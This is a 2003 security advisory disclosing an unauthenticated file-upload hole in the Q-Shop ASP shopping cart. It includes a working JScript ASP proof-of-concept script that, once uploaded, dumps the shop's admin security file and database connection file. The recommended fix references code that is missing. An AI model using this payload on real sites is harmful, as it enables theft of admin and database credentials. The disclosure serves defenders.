$Id: bosen-adv.8,v1 10/07/2003 bosen Exp $ 1ndonesian Security Team (1st) Bosen Advisory #8 10/07/2003 [1st] Q-Shop Administration Security Leak + Exploit _______________________________________________________________________________ 1ndonesian Security Team (1st) http://bosen.net/releases/ ============================================================================================== Security Advisory Advisory Name: Q-Shop Administration Security Leak Release Date: 05/15/2003 Application: v2.5 Platform: Win32 Severity: High BUG Type: CGI - Write to Server Author: Bosen Discover by: Bosen Vendor Status: See below. Vendor URL: http://quadcomm.com/qshop/ Reference: http://bosen.net/releases/ Overview: From http://quadcomm.com/qshop/ "Q-Shop is the all ASP shopping cart / storefront system that covers all your needs for ecommerce web sites. Q-Shop is not just a shopping cart but a full online shop system including web based shop administration." The vulnerability lies on /admin/outputFile.asp The /admin/outputFile.asp unprotected, so anyone would be able to upload anyfile into the server. Details: The vulnerability lies on /admin/outputFile.asp The /admin/outputFile.asp unprotected, so anyone would be able to upload anyfile into the server. These will couse any attacker upload thei malicious file/script/programs/ into server. Not just that, beside you can upload it via your own form. The QSHOP it self provide /admin/upload.htm that makes attacker would be more easier to do they job. And again since the file extention is .htm, it doesnt check any privilegde permission also. Exploits/POC: bosen.asp ---START--- // 1ndonesian Security Team // http://bosen.net/releases/ // // bosen.asp // Do server side file reading and dump it to the web as a text file. // <% @ Language = JScript %> <% function WinPath(absPath) {this.absolutePath = absPath;} function getAbsPath() {return this.absolutePath;} WinPath.prototype.getAbsolutePath = getAbsPath; function fileRead(file) { var FSO = new ActiveXObject("Scripting.FileSystemObject"), strOut = "" var tmp = file, f, g = FSO.GetFile(tmp); f = FSO.OpenTextFile(tmp, 1, false); strOut = "
";
  strOut+= Server.HTMLEncode(f.ReadAll());
  strOut+= "
"; f.Close(); return(strOut); } var a = new WinPath(Server.Mappath("/")); var curDir = a.getAbsolutePath(); // You can change these var admin = curDir + "\\q-shop25\\admin\\security.asp"; var db = curDir + "\\q-shop25\\inc\\conx.asp"; with (Response) { Write("ServerRoot : "+curDir+"
"); Write("Admin Info : "+admin+"

"); Write(fileRead(admin)); Write("DB Info : "+db+"

"); Write(fileRead(db)); } %> ---END-- Upload this file, and browse it. It will shows you current configurations file. You may change the admin path, and db path, depend on target URL. Vendor Response: Contacted. No Response. Recommendation: * Protect /admin site with htpasswd. * Put these code in top of the line of upload.asp 1ndonesian Security Team (1st) Advisory: http://bosen.net/releases/ About 1ndonesian Security Team: 1ndonesian Security Team, research and develop intelligent, advanced application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments. 1st provides security information and patches for use by the entire 1st community. This information is provided freely to all interested parties and may be redistributed provided that it is not altered in any way, 1st is appropriately credited and the document retains. Bosen ====================== Original document can be fount at http://bosen.net/releases/?id=43